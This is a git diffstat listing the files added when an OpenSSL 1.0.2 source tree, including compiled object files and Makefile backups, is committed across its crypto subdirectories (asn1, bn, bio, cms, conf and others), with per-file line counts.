 .../openssl-1.0.2/crypto/asn1/p8_pkey.o       |   Bin 0 -> 4488 bytes
 .../openssl-1.0.2/crypto/asn1/t_bitst.c       |   105 +
 .../openssl-1.0.2/crypto/asn1/t_bitst.o       |   Bin 0 -> 2760 bytes
 .../openssl-1.0.2/crypto/asn1/t_crl.c         |   133 +
 .../openssl-1.0.2/crypto/asn1/t_crl.o         |   Bin 0 -> 4840 bytes
 .../openssl-1.0.2/crypto/asn1/t_pkey.c        |   113 +
 .../openssl-1.0.2/crypto/asn1/t_pkey.o        |   Bin 0 -> 3136 bytes
 .../openssl-1.0.2/crypto/asn1/t_req.c         |   254 +
 .../openssl-1.0.2/crypto/asn1/t_req.o         |   Bin 0 -> 7352 bytes
 .../openssl-1.0.2/crypto/asn1/t_spki.c        |   108 +
 .../openssl-1.0.2/crypto/asn1/t_spki.o        |   Bin 0 -> 3400 bytes
 .../openssl-1.0.2/crypto/asn1/t_x509.c        |   555 +
 .../openssl-1.0.2/crypto/asn1/t_x509.o        |   Bin 0 -> 13328 bytes
 .../openssl-1.0.2/crypto/asn1/t_x509a.c       |   115 +
 .../openssl-1.0.2/crypto/asn1/t_x509a.o       |   Bin 0 -> 3912 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_dec.c      |  1210 ++
 .../openssl-1.0.2/crypto/asn1/tasn_dec.o      |   Bin 0 -> 12848 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_enc.c      |   661 +
 .../openssl-1.0.2/crypto/asn1/tasn_enc.o      |   Bin 0 -> 8704 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_fre.c      |   249 +
 .../openssl-1.0.2/crypto/asn1/tasn_fre.o      |   Bin 0 -> 4760 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_new.c      |   381 +
 .../openssl-1.0.2/crypto/asn1/tasn_new.o      |   Bin 0 -> 4944 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_prn.c      |   582 +
 .../openssl-1.0.2/crypto/asn1/tasn_prn.o      |   Bin 0 -> 10872 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_typ.c      |   149 +
 .../openssl-1.0.2/crypto/asn1/tasn_typ.o      |   Bin 0 -> 18320 bytes
 .../openssl-1.0.2/crypto/asn1/tasn_utl.c      |   275 +
 .../openssl-1.0.2/crypto/asn1/tasn_utl.o      |   Bin 0 -> 3520 bytes
 .../openssl-1.0.2/crypto/asn1/x_algor.c       |   148 +
 .../openssl-1.0.2/crypto/asn1/x_algor.o       |   Bin 0 -> 5128 bytes
 .../openssl-1.0.2/crypto/asn1/x_attrib.c      |   124 +
 .../openssl-1.0.2/crypto/asn1/x_attrib.o      |   Bin 0 -> 4392 bytes
 .../openssl-1.0.2/crypto/asn1/x_bignum.c      |   143 +
 .../openssl-1.0.2/crypto/asn1/x_bignum.o      |   Bin 0 -> 3352 bytes
 .../openssl-1.0.2/crypto/asn1/x_crl.c         |   517 +
 .../openssl-1.0.2/crypto/asn1/x_crl.o         |   Bin 0 -> 12992 bytes
 .../openssl-1.0.2/crypto/asn1/x_exten.c       |    77 +
 .../openssl-1.0.2/crypto/asn1/x_exten.o       |   Bin 0 -> 4072 bytes
 .../openssl-1.0.2/crypto/asn1/x_info.c        |   117 +
 .../openssl-1.0.2/crypto/asn1/x_info.o        |   Bin 0 -> 2472 bytes
 .../openssl-1.0.2/crypto/asn1/x_long.c        |   183 +
 .../openssl-1.0.2/crypto/asn1/x_long.o        |   Bin 0 -> 3328 bytes
 .../openssl-1.0.2/crypto/asn1/x_name.c        |   527 +
 .../openssl-1.0.2/crypto/asn1/x_name.o        |   Bin 0 -> 10824 bytes
 .../openssl-1.0.2/crypto/asn1/x_nx509.c       |    72 +
 .../openssl-1.0.2/crypto/asn1/x_nx509.o       |   Bin 0 -> 3064 bytes
 .../openssl-1.0.2/crypto/asn1/x_pkey.c        |   153 +
 .../openssl-1.0.2/crypto/asn1/x_pkey.o        |   Bin 0 -> 4080 bytes
 .../openssl-1.0.2/crypto/asn1/x_pubkey.c      |   371 +
 .../openssl-1.0.2/crypto/asn1/x_pubkey.o      |   Bin 0 -> 7848 bytes
 .../openssl-1.0.2/crypto/asn1/x_req.c         |   116 +
 .../openssl-1.0.2/crypto/asn1/x_req.o         |   Bin 0 -> 5240 bytes
 .../openssl-1.0.2/crypto/asn1/x_sig.c         |    69 +
 .../openssl-1.0.2/crypto/asn1/x_sig.o         |   Bin 0 -> 3048 bytes
 .../openssl-1.0.2/crypto/asn1/x_spki.c        |    82 +
 .../openssl-1.0.2/crypto/asn1/x_spki.o        |   Bin 0 -> 4296 bytes
 .../openssl-1.0.2/crypto/asn1/x_val.c         |    69 +
 .../openssl-1.0.2/crypto/asn1/x_val.o         |   Bin 0 -> 3000 bytes
 .../openssl-1.0.2/crypto/asn1/x_x509.c        |   220 +
 .../openssl-1.0.2/crypto/asn1/x_x509.o        |   Bin 0 -> 8224 bytes
 .../openssl-1.0.2/crypto/asn1/x_x509a.c       |   193 +
 .../openssl-1.0.2/crypto/asn1/x_x509a.o       |   Bin 0 -> 7040 bytes
 .../openssl-1.0.2/crypto/bf/COPYRIGHT         |    46 +
 .../openssl-1.0.2/crypto/bf/INSTALL           |    14 +
 .../openssl-1.0.2/crypto/bf/Makefile          |   101 +
 .../openssl-1.0.2/crypto/bf/Makefile.bak      |   101 +
 .../openssl-1.0.2/crypto/bf/Makefile.save     |   101 +
 .../openssl-1.0.2/crypto/bf/README            |     8 +
 .../openssl-1.0.2/crypto/bf/VERSION           |     6 +
 .../openssl-1.0.2/crypto/bf/asm/bf-586.pl     |   137 +
 .../openssl-1.0.2/crypto/bf/asm/bf-686.pl     |   127 +
 .../openssl-1.0.2/crypto/bf/asm/readme        |    10 +
 .../openssl-1.0.2/crypto/bf/bf_cbc.c          |   135 +
 .../openssl-1.0.2/crypto/bf/bf_cfb64.c        |   123 +
 .../openssl-1.0.2/crypto/bf/bf_cfb64.o        |   Bin 0 -> 1992 bytes
 .../openssl-1.0.2/crypto/bf/bf_ecb.c          |   100 +
 .../openssl-1.0.2/crypto/bf/bf_ecb.o          |   Bin 0 -> 2240 bytes
 .../openssl-1.0.2/crypto/bf/bf_enc.c          |   300 +
 .../openssl-1.0.2/crypto/bf/bf_enc.o          |   Bin 0 -> 5392 bytes
 .../openssl-1.0.2/crypto/bf/bf_locl.h         |   221 +
 .../openssl-1.0.2/crypto/bf/bf_ofb64.c        |   110 +
 .../openssl-1.0.2/crypto/bf/bf_ofb64.o        |   Bin 0 -> 1912 bytes
 .../openssl-1.0.2/crypto/bf/bf_opts.c         |   324 +
 .../openssl-1.0.2/crypto/bf/bf_pi.h           |   579 +
 .../openssl-1.0.2/crypto/bf/bf_skey.c         |   125 +
 .../openssl-1.0.2/crypto/bf/bf_skey.o         |   Bin 0 -> 6248 bytes
 .../openssl-1.0.2/crypto/bf/bfs.cpp           |    67 +
 .../openssl-1.0.2/crypto/bf/bfspeed.c         |   265 +
 .../openssl-1.0.2/crypto/bf/bftest.c          |   538 +
 .../openssl-1.0.2/crypto/bf/blowfish.h        |   130 +
 .../openssl-1.0.2/crypto/bf/lib               |     0
 .../openssl-1.0.2/crypto/bio/Makefile         |   222 +
 .../openssl-1.0.2/crypto/bio/Makefile.bak     |   222 +
 .../openssl-1.0.2/crypto/bio/Makefile.save    |   222 +
 .../openssl-1.0.2/crypto/bio/b_dump.c         |   209 +
 .../openssl-1.0.2/crypto/bio/b_dump.o         |   Bin 0 -> 4920 bytes
 .../openssl-1.0.2/crypto/bio/b_print.c        |   816 ++
 .../openssl-1.0.2/crypto/bio/b_print.o        |   Bin 0 -> 9584 bytes
 .../openssl-1.0.2/crypto/bio/b_sock.c         |   962 ++
 .../openssl-1.0.2/crypto/bio/b_sock.o         |   Bin 0 -> 10360 bytes
 .../openssl-1.0.2/crypto/bio/bf_buff.c        |   517 +
 .../openssl-1.0.2/crypto/bio/bf_buff.o        |   Bin 0 -> 7112 bytes
 .../openssl-1.0.2/crypto/bio/bf_lbuf.c        |   391 +
 .../openssl-1.0.2/crypto/bio/bf_nbio.c        |   251 +
 .../openssl-1.0.2/crypto/bio/bf_nbio.o        |   Bin 0 -> 4664 bytes
 .../openssl-1.0.2/crypto/bio/bf_null.c        |   189 +
 .../openssl-1.0.2/crypto/bio/bf_null.o        |   Bin 0 -> 3816 bytes
 .../openssl-1.0.2/crypto/bio/bio.h            |   878 ++
 .../openssl-1.0.2/crypto/bio/bio_cb.c         |   142 +
 .../openssl-1.0.2/crypto/bio/bio_cb.o         |   Bin 0 -> 4184 bytes
 .../openssl-1.0.2/crypto/bio/bio_err.c        |   156 +
 .../openssl-1.0.2/crypto/bio/bio_err.o        |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/bio/bio_lcl.h        |    36 +
 .../openssl-1.0.2/crypto/bio/bio_lib.c        |   594 +
 .../openssl-1.0.2/crypto/bio/bio_lib.o        |   Bin 0 -> 8936 bytes
 .../openssl-1.0.2/crypto/bio/bss_acpt.c       |   463 +
 .../openssl-1.0.2/crypto/bio/bss_acpt.o       |   Bin 0 -> 6376 bytes
 .../openssl-1.0.2/crypto/bio/bss_bio.c        |   886 ++
 .../openssl-1.0.2/crypto/bio/bss_bio.o        |   Bin 0 -> 8472 bytes
 .../openssl-1.0.2/crypto/bio/bss_conn.c       |   603 +
 .../openssl-1.0.2/crypto/bio/bss_conn.o       |   Bin 0 -> 9984 bytes
 .../openssl-1.0.2/crypto/bio/bss_dgram.c      |  2069 +++
 .../openssl-1.0.2/crypto/bio/bss_dgram.o      |   Bin 0 -> 9256 bytes
 .../openssl-1.0.2/crypto/bio/bss_fd.c         |   330 +
 .../openssl-1.0.2/crypto/bio/bss_fd.o         |   Bin 0 -> 5072 bytes
 .../openssl-1.0.2/crypto/bio/bss_file.c       |   465 +
 .../openssl-1.0.2/crypto/bio/bss_file.o       |   Bin 0 -> 6792 bytes
 .../openssl-1.0.2/crypto/bio/bss_log.c        |   453 +
 .../openssl-1.0.2/crypto/bio/bss_log.o        |   Bin 0 -> 4064 bytes
 .../openssl-1.0.2/crypto/bio/bss_mem.c        |   311 +
 .../openssl-1.0.2/crypto/bio/bss_mem.o        |   Bin 0 -> 4944 bytes
 .../openssl-1.0.2/crypto/bio/bss_null.c       |   149 +
 .../openssl-1.0.2/crypto/bio/bss_null.o       |   Bin 0 -> 2736 bytes
 .../openssl-1.0.2/crypto/bio/bss_rtcp.c       |   319 +
 .../openssl-1.0.2/crypto/bio/bss_sock.c       |   287 +
 .../openssl-1.0.2/crypto/bio/bss_sock.o       |   Bin 0 -> 4256 bytes
 .../openssl-1.0.2/crypto/bio/lib              |     0
 .../openssl-1.0.2/crypto/bn/Makefile          |   388 +
 .../openssl-1.0.2/crypto/bn/Makefile.bak      |   388 +
 .../openssl-1.0.2/crypto/bn/Makefile.save     |   388 +
 .../openssl-1.0.2/crypto/bn/asm/README        |    27 +
 .../openssl-1.0.2/crypto/bn/asm/alpha-mont.pl |   321 +
 .../openssl-1.0.2/crypto/bn/asm/armv4-gf2m.pl |   289 +
 .../openssl-1.0.2/crypto/bn/asm/armv4-mont.pl |   676 +
 .../openssl-1.0.2/crypto/bn/asm/bn-586.pl     |   774 ++
 .../openssl-1.0.2/crypto/bn/asm/co-586.pl     |   287 +
 .../openssl-1.0.2/crypto/bn/asm/ia64-mont.pl  |   851 ++
 .../openssl-1.0.2/crypto/bn/asm/ia64.S        |  1555 +++
 .../openssl-1.0.2/crypto/bn/asm/mips-mont.pl  |   426 +
 .../openssl-1.0.2/crypto/bn/asm/mips.pl       |  2234 ++++
 .../openssl-1.0.2/crypto/bn/asm/mips3-mont.pl |   327 +
 .../openssl-1.0.2/crypto/bn/asm/mips3.s       |  2201 ++++
 .../crypto/bn/asm/modexp512-x86_64.pl         |  1497 +++
 .../openssl-1.0.2/crypto/bn/asm/pa-risc2.s    |  1618 +++
 .../openssl-1.0.2/crypto/bn/asm/pa-risc2W.s   |  1605 +++
 .../crypto/bn/asm/parisc-mont.pl              |   995 ++
 .../openssl-1.0.2/crypto/bn/asm/ppc-mont.pl   |   335 +
 .../openssl-1.0.2/crypto/bn/asm/ppc.pl        |  2008 +++
 .../openssl-1.0.2/crypto/bn/asm/ppc64-mont.pl |  1626 +++
 .../openssl-1.0.2/crypto/bn/asm/rsaz-avx2.pl  |  1898 +++
 .../crypto/bn/asm/rsaz-x86_64.pl              |  2144 +++
 .../openssl-1.0.2/crypto/bn/asm/s390x-gf2m.pl |   221 +
 .../openssl-1.0.2/crypto/bn/asm/s390x-mont.pl |   277 +
 .../openssl-1.0.2/crypto/bn/asm/s390x.S       |   678 +
 .../crypto/bn/asm/sparct4-mont.pl             |  1222 ++
 .../openssl-1.0.2/crypto/bn/asm/sparcv8.S     |  1458 +++
 .../openssl-1.0.2/crypto/bn/asm/sparcv8plus.S |  1558 +++
 .../crypto/bn/asm/sparcv9-gf2m.pl             |   190 +
 .../crypto/bn/asm/sparcv9-mont.pl             |   606 +
 .../crypto/bn/asm/sparcv9a-mont.pl            |   882 ++
 .../openssl-1.0.2/crypto/bn/asm/via-mont.pl   |   242 +
 .../openssl-1.0.2/crypto/bn/asm/vis3-mont.pl  |   373 +
 .../openssl-1.0.2/crypto/bn/asm/vms.mar       |  6440 +++++++++
 .../openssl-1.0.2/crypto/bn/asm/x86-gf2m.pl   |   313 +
 .../openssl-1.0.2/crypto/bn/asm/x86-mont.pl   |   593 +
 .../openssl-1.0.2/crypto/bn/asm/x86.pl        |    28 +
 .../openssl-1.0.2/crypto/bn/asm/x86/add.pl    |    76 +
 .../openssl-1.0.2/crypto/bn/asm/x86/comba.pl  |   277 +
 .../openssl-1.0.2/crypto/bn/asm/x86/div.pl    |    15 +
 .../openssl-1.0.2/crypto/bn/asm/x86/f         |     3 +
 .../openssl-1.0.2/crypto/bn/asm/x86/mul.pl    |    77 +
 .../crypto/bn/asm/x86/mul_add.pl              |    87 +
 .../openssl-1.0.2/crypto/bn/asm/x86/sqr.pl    |    60 +
 .../openssl-1.0.2/crypto/bn/asm/x86/sub.pl    |    76 +
 .../openssl-1.0.2/crypto/bn/asm/x86_64-gcc.c  |   638 +
 .../crypto/bn/asm/x86_64-gf2m.pl              |   390 +
 .../crypto/bn/asm/x86_64-mont.pl              |  1402 ++
 .../crypto/bn/asm/x86_64-mont5.pl             |  3514 +++++
 .../openssl-1.0.2/crypto/bn/bn.h              |   934 ++
 .../openssl-1.0.2/crypto/bn/bn.mul            |    19 +
 .../openssl-1.0.2/crypto/bn/bn_add.c          |   313 +
 .../openssl-1.0.2/crypto/bn/bn_add.o          |   Bin 0 -> 3240 bytes
 .../openssl-1.0.2/crypto/bn/bn_asm.c          |  1093 ++
 .../openssl-1.0.2/crypto/bn/bn_asm.o          |   Bin 0 -> 16800 bytes
 .../openssl-1.0.2/crypto/bn/bn_blind.c        |   385 +
 .../openssl-1.0.2/crypto/bn/bn_blind.o        |   Bin 0 -> 5400 bytes
 .../openssl-1.0.2/crypto/bn/bn_const.c        |   547 +
 .../openssl-1.0.2/crypto/bn/bn_const.o        |   Bin 0 -> 6568 bytes
 .../openssl-1.0.2/crypto/bn/bn_ctx.c          |   448 +
 .../openssl-1.0.2/crypto/bn/bn_ctx.o          |   Bin 0 -> 3776 bytes
 .../openssl-1.0.2/crypto/bn/bn_depr.c         |   115 +
 .../openssl-1.0.2/crypto/bn/bn_depr.o         |   Bin 0 -> 2472 bytes
 .../openssl-1.0.2/crypto/bn/bn_div.c          |   477 +
 .../openssl-1.0.2/crypto/bn/bn_div.o          |   Bin 0 -> 4264 bytes
 .../openssl-1.0.2/crypto/bn/bn_err.c          |   150 +
 .../openssl-1.0.2/crypto/bn/bn_err.o          |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/bn/bn_exp.c          |  1400 ++
 .../openssl-1.0.2/crypto/bn/bn_exp.o          |   Bin 0 -> 13224 bytes
 .../openssl-1.0.2/crypto/bn/bn_exp2.c         |   303 +
 .../openssl-1.0.2/crypto/bn/bn_exp2.o         |   Bin 0 -> 4680 bytes
 .../openssl-1.0.2/crypto/bn/bn_gcd.c          |   700 +
 .../openssl-1.0.2/crypto/bn/bn_gcd.o          |   Bin 0 -> 7344 bytes
 .../openssl-1.0.2/crypto/bn/bn_gf2m.c         |  1293 ++
 .../openssl-1.0.2/crypto/bn/bn_gf2m.o         |   Bin 0 -> 14824 bytes
 .../openssl-1.0.2/crypto/bn/bn_kron.c         |   186 +
 .../openssl-1.0.2/crypto/bn/bn_kron.o         |   Bin 0 -> 2824 bytes
 .../openssl-1.0.2/crypto/bn/bn_lcl.h          |   537 +
 .../openssl-1.0.2/crypto/bn/bn_lib.c          |   916 ++
 .../openssl-1.0.2/crypto/bn/bn_lib.o          |   Bin 0 -> 9760 bytes
 .../openssl-1.0.2/crypto/bn/bn_mod.c          |   316 +
 .../openssl-1.0.2/crypto/bn/bn_mod.o          |   Bin 0 -> 5120 bytes
 .../openssl-1.0.2/crypto/bn/bn_mont.c         |   555 +
 .../openssl-1.0.2/crypto/bn/bn_mont.o         |   Bin 0 -> 6520 bytes
 .../openssl-1.0.2/crypto/bn/bn_mpi.c          |   128 +
 .../openssl-1.0.2/crypto/bn/bn_mpi.o          |   Bin 0 -> 2288 bytes
 .../openssl-1.0.2/crypto/bn/bn_mul.c          |  1164 ++
 .../openssl-1.0.2/crypto/bn/bn_mul.o          |   Bin 0 -> 11632 bytes
 .../openssl-1.0.2/crypto/bn/bn_nist.c         |  1262 ++
 .../openssl-1.0.2/crypto/bn/bn_nist.o         |   Bin 0 -> 11928 bytes
 .../openssl-1.0.2/crypto/bn/bn_prime.c        |   515 +
 .../openssl-1.0.2/crypto/bn/bn_prime.h        |   327 +
 .../openssl-1.0.2/crypto/bn/bn_prime.o        |   Bin 0 -> 11744 bytes
 .../openssl-1.0.2/crypto/bn/bn_prime.pl       |   119 +
 .../openssl-1.0.2/crypto/bn/bn_print.c        |   383 +
 .../openssl-1.0.2/crypto/bn/bn_print.o        |   Bin 0 -> 6608 bytes
 .../openssl-1.0.2/crypto/bn/bn_rand.c         |   289 +
 .../openssl-1.0.2/crypto/bn/bn_rand.o         |   Bin 0 -> 4464 bytes
 .../openssl-1.0.2/crypto/bn/bn_recp.c         |   249 +
 .../openssl-1.0.2/crypto/bn/bn_recp.o         |   Bin 0 -> 5024 bytes
 .../openssl-1.0.2/crypto/bn/bn_shift.c        |   214 +
 .../openssl-1.0.2/crypto/bn/bn_shift.o        |   Bin 0 -> 3016 bytes
 .../openssl-1.0.2/crypto/bn/bn_sqr.c          |   290 +
 .../openssl-1.0.2/crypto/bn/bn_sqr.o          |   Bin 0 -> 4264 bytes
 .../openssl-1.0.2/crypto/bn/bn_sqrt.c         |   409 +
 .../openssl-1.0.2/crypto/bn/bn_sqrt.o         |   Bin 0 -> 5688 bytes
 .../openssl-1.0.2/crypto/bn/bn_word.c         |   227 +
 .../openssl-1.0.2/crypto/bn/bn_word.o         |   Bin 0 -> 3264 bytes
 .../openssl-1.0.2/crypto/bn/bn_x931p.c        |   274 +
 .../openssl-1.0.2/crypto/bn/bn_x931p.o        |   Bin 0 -> 4760 bytes
 .../openssl-1.0.2/crypto/bn/bnspeed.c         |   232 +
 .../openssl-1.0.2/crypto/bn/bntest.c          |  2085 +++
 .../openssl-1.0.2/crypto/bn/divtest.c         |    42 +
 .../openssl-1.0.2/crypto/bn/exp.c             |    61 +
 .../openssl-1.0.2/crypto/bn/expspeed.c        |   381 +
 .../openssl-1.0.2/crypto/bn/exptest.c         |   249 +
 .../openssl-1.0.2/crypto/bn/lib               |     0
 .../openssl-1.0.2/crypto/bn/rsaz_exp.c        |   336 +
 .../openssl-1.0.2/crypto/bn/rsaz_exp.h        |    47 +
 .../openssl-1.0.2/crypto/bn/todo              |     3 +
 .../openssl-1.0.2/crypto/bn/vms-helper.c      |    68 +
 .../openssl-1.0.2/crypto/buffer/Makefile      |    97 +
 .../openssl-1.0.2/crypto/buffer/Makefile.bak  |    97 +
 .../openssl-1.0.2/crypto/buffer/Makefile.save |    97 +
 .../openssl-1.0.2/crypto/buffer/buf_err.c     |    97 +
 .../openssl-1.0.2/crypto/buffer/buf_err.o     |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/buffer/buf_str.c     |   130 +
 .../openssl-1.0.2/crypto/buffer/buf_str.o     |   Bin 0 -> 2736 bytes
 .../openssl-1.0.2/crypto/buffer/buffer.c      |   187 +
 .../openssl-1.0.2/crypto/buffer/buffer.h      |   119 +
 .../openssl-1.0.2/crypto/buffer/buffer.o      |   Bin 0 -> 3312 bytes
 .../openssl-1.0.2/crypto/buffer/lib           |     0
 .../openssl-1.0.2/crypto/buildinf.h           |    19 +
 .../openssl-1.0.2/crypto/camellia/Makefile    |   112 +
 .../crypto/camellia/Makefile.bak              |   112 +
 .../crypto/camellia/Makefile.save             |   112 +
 .../crypto/camellia/asm/cmll-x86.pl           |  1138 ++
 .../crypto/camellia/asm/cmll-x86_64.pl        |  1081 ++
 .../crypto/camellia/asm/cmllt4-sparcv9.pl     |   929 ++
 .../openssl-1.0.2/crypto/camellia/camellia.c  |   584 +
 .../openssl-1.0.2/crypto/camellia/camellia.h  |   132 +
 .../openssl-1.0.2/crypto/camellia/camellia.o  |   Bin 0 -> 11696 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_cbc.c  |    66 +
 .../openssl-1.0.2/crypto/camellia/cmll_cbc.o  |   Bin 0 -> 1784 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_cfb.c  |   141 +
 .../openssl-1.0.2/crypto/camellia/cmll_cfb.o  |   Bin 0 -> 2104 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_ctr.c  |    64 +
 .../openssl-1.0.2/crypto/camellia/cmll_ctr.o  |   Bin 0 -> 1656 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_ecb.c  |    73 +
 .../openssl-1.0.2/crypto/camellia/cmll_ecb.o  |   Bin 0 -> 1632 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_locl.h |    88 +
 .../openssl-1.0.2/crypto/camellia/cmll_misc.c |    80 +
 .../openssl-1.0.2/crypto/camellia/cmll_misc.o |   Bin 0 -> 2192 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_ofb.c  |   122 +
 .../openssl-1.0.2/crypto/camellia/cmll_ofb.o  |   Bin 0 -> 1656 bytes
 .../openssl-1.0.2/crypto/camellia/cmll_utl.c  |    64 +
 .../openssl-1.0.2/crypto/camellia/cmll_utl.o  |   Bin 0 -> 1544 bytes
 .../openssl-1.0.2/crypto/camellia/lib         |     0
 .../openssl-1.0.2/crypto/cast/Makefile        |   102 +
 .../openssl-1.0.2/crypto/cast/Makefile.bak    |   102 +
 .../openssl-1.0.2/crypto/cast/Makefile.save   |   102 +
 .../openssl-1.0.2/crypto/cast/asm/cast-586.pl |   177 +
 .../openssl-1.0.2/crypto/cast/asm/readme      |     7 +
 .../openssl-1.0.2/crypto/cast/c_cfb64.c       |   123 +
 .../openssl-1.0.2/crypto/cast/c_cfb64.o       |   Bin 0 -> 2000 bytes
 .../openssl-1.0.2/crypto/cast/c_ecb.c         |    83 +
 .../openssl-1.0.2/crypto/cast/c_ecb.o         |   Bin 0 -> 1968 bytes
 .../openssl-1.0.2/crypto/cast/c_enc.c         |   200 +
 .../openssl-1.0.2/crypto/cast/c_enc.o         |   Bin 0 -> 5568 bytes
 .../openssl-1.0.2/crypto/cast/c_ofb64.c       |   110 +
 .../openssl-1.0.2/crypto/cast/c_ofb64.o       |   Bin 0 -> 1920 bytes
 .../openssl-1.0.2/crypto/cast/c_skey.c        |   175 +
 .../openssl-1.0.2/crypto/cast/c_skey.o        |   Bin 0 -> 12488 bytes
 .../openssl-1.0.2/crypto/cast/cast.h          |   107 +
 .../openssl-1.0.2/crypto/cast/cast_lcl.h      |   227 +
 .../openssl-1.0.2/crypto/cast/cast_s.h        |   592 +
 .../openssl-1.0.2/crypto/cast/cast_spd.c      |   262 +
 .../openssl-1.0.2/crypto/cast/castopts.c      |   334 +
 .../openssl-1.0.2/crypto/cast/casts.cpp       |    70 +
 .../openssl-1.0.2/crypto/cast/casttest.c      |   241 +
 .../openssl-1.0.2/crypto/cast/lib             |     0
 .../openssl-1.0.2/crypto/cmac/Makefile        |   109 +
 .../openssl-1.0.2/crypto/cmac/Makefile.bak    |   109 +
 .../openssl-1.0.2/crypto/cmac/Makefile.save   |   109 +
 .../openssl-1.0.2/crypto/cmac/cm_ameth.c      |    96 +
 .../openssl-1.0.2/crypto/cmac/cm_ameth.o      |   Bin 0 -> 2296 bytes
 .../openssl-1.0.2/crypto/cmac/cm_pmeth.c      |   216 +
 .../openssl-1.0.2/crypto/cmac/cm_pmeth.o      |   Bin 0 -> 4784 bytes
 .../openssl-1.0.2/crypto/cmac/cmac.c          |   296 +
 .../openssl-1.0.2/crypto/cmac/cmac.h          |    82 +
 .../openssl-1.0.2/crypto/cmac/cmac.o          |   Bin 0 -> 5096 bytes
 .../openssl-1.0.2/crypto/cmac/lib             |     0
 .../openssl-1.0.2/crypto/cms/Makefile         |   279 +
 .../openssl-1.0.2/crypto/cms/Makefile.bak     |   279 +
 .../openssl-1.0.2/crypto/cms/Makefile.save    |   279 +
 .../openssl-1.0.2/crypto/cms/cms.h            |   555 +
 .../openssl-1.0.2/crypto/cms/cms_asn1.c       |   459 +
 .../openssl-1.0.2/crypto/cms/cms_asn1.o       |   Bin 0 -> 26680 bytes
 .../openssl-1.0.2/crypto/cms/cms_att.c        |   197 +
 .../openssl-1.0.2/crypto/cms/cms_att.o        |   Bin 0 -> 4600 bytes
 .../openssl-1.0.2/crypto/cms/cms_cd.c         |   134 +
 .../openssl-1.0.2/crypto/cms/cms_cd.o         |   Bin 0 -> 1080 bytes
 .../openssl-1.0.2/crypto/cms/cms_dd.c         |   145 +
 .../openssl-1.0.2/crypto/cms/cms_dd.o         |   Bin 0 -> 3168 bytes
 .../openssl-1.0.2/crypto/cms/cms_enc.c        |   260 +
 .../openssl-1.0.2/crypto/cms/cms_enc.o        |   Bin 0 -> 5528 bytes
 .../openssl-1.0.2/crypto/cms/cms_env.c        |   974 ++
 .../openssl-1.0.2/crypto/cms/cms_env.o        |   Bin 0 -> 13136 bytes
 .../openssl-1.0.2/crypto/cms/cms_err.c        |   309 +
 .../openssl-1.0.2/crypto/cms/cms_err.o        |   Bin 0 -> 1360 bytes
 .../openssl-1.0.2/crypto/cms/cms_ess.c        |   395 +
 .../openssl-1.0.2/crypto/cms/cms_ess.o        |   Bin 0 -> 7560 bytes
 .../openssl-1.0.2/crypto/cms/cms_io.c         |   133 +
 .../openssl-1.0.2/crypto/cms/cms_io.o         |   Bin 0 -> 4680 bytes
 .../openssl-1.0.2/crypto/cms/cms_kari.c       |   461 +
 .../openssl-1.0.2/crypto/cms/cms_kari.o       |   Bin 0 -> 8528 bytes
 .../openssl-1.0.2/crypto/cms/cms_lcl.h        |   471 +
 .../openssl-1.0.2/crypto/cms/cms_lib.c        |   652 +
 .../openssl-1.0.2/crypto/cms/cms_lib.o        |   Bin 0 -> 14792 bytes
 .../openssl-1.0.2/crypto/cms/cms_pwri.c       |   429 +
 .../openssl-1.0.2/crypto/cms/cms_pwri.o       |   Bin 0 -> 7416 bytes
 .../openssl-1.0.2/crypto/cms/cms_sd.c         |   955 ++
 .../openssl-1.0.2/crypto/cms/cms_sd.o         |   Bin 0 -> 18136 bytes
 .../openssl-1.0.2/crypto/cms/cms_smime.c      |   835 ++
 .../openssl-1.0.2/crypto/cms/cms_smime.o      |   Bin 0 -> 16480 bytes
 .../openssl-1.0.2/crypto/cms/lib              |     0
 .../openssl-1.0.2/crypto/comp/Makefile        |   108 +
 .../openssl-1.0.2/crypto/comp/Makefile.save   |   108 +
 .../openssl-1.0.2/crypto/comp/c_rle.c         |    62 +
 .../openssl-1.0.2/crypto/comp/c_zlib.c        |   762 ++
 .../openssl-1.0.2/crypto/comp/comp.h          |    79 +
 .../openssl-1.0.2/crypto/comp/comp_err.c      |    98 +
 .../openssl-1.0.2/crypto/comp/comp_lib.c      |    66 +
 .../openssl-1.0.2/crypto/conf/Makefile        |   146 +
 .../openssl-1.0.2/crypto/conf/Makefile.bak    |   146 +
 .../openssl-1.0.2/crypto/conf/Makefile.save   |   146 +
 .../openssl-1.0.2/crypto/conf/README          |    73 +
 .../openssl-1.0.2/crypto/conf/cnf_save.c      |   104 +
 .../openssl-1.0.2/crypto/conf/conf.h          |   267 +
 .../openssl-1.0.2/crypto/conf/conf_api.c      |   305 +
 .../openssl-1.0.2/crypto/conf/conf_api.h      |    89 +
 .../openssl-1.0.2/crypto/conf/conf_api.o      |   Bin 0 -> 5680 bytes
 .../openssl-1.0.2/crypto/conf/conf_def.c      |   703 +
 .../openssl-1.0.2/crypto/conf/conf_def.h      |   181 +
 .../openssl-1.0.2/crypto/conf/conf_def.o      |   Bin 0 -> 11016 bytes
 .../openssl-1.0.2/crypto/conf/conf_err.c      |   133 +
 .../openssl-1.0.2/crypto/conf/conf_err.o      |   Bin 0 -> 1368 bytes
 .../openssl-1.0.2/crypto/conf/conf_lib.c      |   391 +
 .../openssl-1.0.2/crypto/conf/conf_lib.o      |   Bin 0 -> 7488 bytes
 .../openssl-1.0.2/crypto/conf/conf_mall.c     |    81 +
 .../openssl-1.0.2/crypto/conf/conf_mall.o     |   Bin 0 -> 1640 bytes
 .../openssl-1.0.2/crypto/conf/conf_mod.c      |   597 +
 .../openssl-1.0.2/crypto/conf/conf_mod.o      |   Bin 0 -> 9752 bytes
 .../openssl-1.0.2/crypto/conf/conf_sap.c      |   111 +
 .../openssl-1.0.2/crypto/conf/conf_sap.o      |   Bin 0 -> 2608 bytes
